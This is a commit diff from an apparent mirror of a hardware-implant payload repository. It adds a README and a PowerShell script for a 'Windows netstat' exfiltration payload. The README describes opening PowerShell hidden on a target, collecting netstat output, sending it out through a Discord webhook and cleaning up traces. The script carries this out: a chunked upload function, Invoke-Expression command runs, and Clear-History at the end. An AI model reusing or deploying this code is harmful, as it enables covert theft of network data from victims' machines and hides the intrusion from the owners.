mirror of https://github.com/hak5/omg-payloads.git
readme
aleff-github
parent
5d2c65387b
commit
83f97b85cc
|
|
@ -0,0 +1,41 @@
|
|||
# Windows netstat ✅
|
||||
|
||||
A script used to stole target netstat status.
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
This script will stole target netstat status.
|
||||
|
||||
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
|
||||
Then it cleans up traces of what you have done after.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke the indicated commands
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|
||||
### Settings
|
||||
Put 1 on the function that you want to active, else 0.
|
||||
Functions available:
|
||||
- default (*or simple 'netstat' command*)
|
||||
- routing_table **$r**
|
||||
- listening_canonical **$lc**
|
||||
- listening_numerical **$ln**
|
||||
- all_canonical **$ac**
|
||||
- all_numerical **$an**
|
||||
- offload **ot**
|
||||
- proto **$p "\<protocol>"**
|
||||
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,79 @@
|
|||
|
||||
# Discord send function
|
||||
function exfiltration () {
|
||||
param(
|
||||
[Parameter (Mandatory = $true, Position=0)] [String]$command,
|
||||
[Parameter (Mandatory = $true, Position=1)] [String]$text
|
||||
)
|
||||
# Loop for Discord
|
||||
$ConstantLimitForRestMethod = 1999
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = ""
|
||||
}
|
||||
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||
try {
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||
}
|
||||
} catch [ArgumentOutOfRangeException] {
|
||||
if($text.Length-$i -gt 0){
|
||||
$TMP_Body = @{
|
||||
'username' = $command
|
||||
'content' = $text.Substring($i, $text.Length-$i)
|
||||
}
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||
}
|
||||
}
|
||||
|
||||
# send command format
|
||||
function send_command(){
|
||||
param(
|
||||
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
|
||||
)
|
||||
$out = Invoke-Expression $cmd
|
||||
(exfiltration $cmd [string]$out)
|
||||
}
|
||||
|
||||
# Settings
|
||||
if ( $d -eq "1") {
|
||||
$cmd = "netstat"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $r -eq "1") {
|
||||
$cmd = "netstat -r"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $lc -eq "1") {
|
||||
$cmd = "netstat -af"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $ln -eq "1") {
|
||||
$cmd = "netstat -an"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $ac -eq "1") {
|
||||
$cmd = "netstat -qf"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $an -eq "1") {
|
||||
$cmd = "netstat -qn"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $o -eq "1") {
|
||||
$cmd = "netstat -t"
|
||||
(send_command $cmd)
|
||||
}
|
||||
if ( $p -ne "" ) {
|
||||
# format $proto="TCP"
|
||||
$cmd = "netstat -ps " + $p
|
||||
(send_command $cmd)
|
||||
}
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
||||
Loading…
Reference in New Issue